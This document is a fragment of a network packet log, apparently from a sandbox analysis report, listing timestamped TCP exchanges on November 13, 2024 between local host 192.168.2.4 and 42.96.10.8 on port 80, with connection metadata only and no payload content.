                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788005114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788028002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788064003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788068056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788079023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788104057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788117886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788134098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788144112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788203955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788203955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788219929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788235903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788249969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788265944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788295984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788309097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788312912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788335085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788357973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788376093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788376093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788379908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.788431883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.828711987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.828785896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.828802109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.828818083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.828831911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.828847885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.828865051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.828915119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.828915119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.828916073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829421043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829440117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829458952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829474926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829493999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829514027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829533100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829544067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829544067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829560995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829566002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829596996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829617023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829633951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829652071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829668045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829672098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829685926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829739094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.829739094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.830544949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.830559015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.830573082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.830590010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.830606937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.830631971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.830631971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.858894110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.858928919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.858947039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.858948946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.858963013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.858979940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.858988047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.858997107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859038115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859076023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859077930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859096050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859111071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859126091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859142065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859158993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859169006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859181881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859186888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859200001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859210014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.859292030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.866667986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.866686106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.866703033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.866746902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.866848946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.866919994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.866939068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.866955042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.867038965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.867965937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.867983103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.867996931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.868097067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.868113995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.868113995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.868130922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.868156910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.868185043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.887145042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.887162924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.887177944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.887222052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.889902115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.889954090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.889970064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.889995098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890010118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890022993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890084028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890100002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890101910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890119076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890134096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890146017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890155077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890175104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890183926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890259981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890280008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890295982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890311003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890326023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890342951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890352011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890358925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890371084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890383959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890398026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890409946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890439034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890453100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890466928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890491009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890496969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890507936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890526056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890533924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890547991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890583992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890615940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890631914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890654087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890672922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890681982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890691042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890717983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890832901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890849113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890856981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890930891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890947104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890960932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890964031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.890989065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891011000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891026974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891041994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891041994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891056061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891067028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891093969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891119003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891133070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891148090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891163111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891166925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891180992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891195059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891206980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891236067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891247034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891253948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891268969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891283989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891310930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891356945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891374111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891391039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891428947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891428947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891457081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891474962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891504049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891505003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891521931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891544104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891547918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891583920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891602039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891602039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891793966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891809940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891825914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891850948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891860008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891870022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891879082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891886950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891901970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891916990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891933918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891944885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891973019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.891999960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892019033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892038107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892071009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892092943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892115116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892121077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892137051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892155886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892174006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892179012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892189980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892198086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892209053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892263889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892287970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892304897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892319918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892335892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892347097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892352104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892378092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892406940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892424107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892438889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892438889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892457008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892465115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892482996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892498016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892510891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892513990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892532110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892643929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892657995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892673016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892673016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892689943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892703056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892705917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892723083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892731905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892760038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892775059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892788887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892803907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892816067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892821074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892831087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892837048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892853975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892854929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892882109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892927885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892944098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892957926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892972946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892986059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.892997980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893001080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893012047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893029928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893032074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893044949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893060923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893076897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893088102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893091917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893107891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893116951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893124104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893131971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893137932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893151999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893172979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893188953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893196106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893218040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893218994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893234015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893248081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893253088 CET4973380192.168.2.442.96.10.8
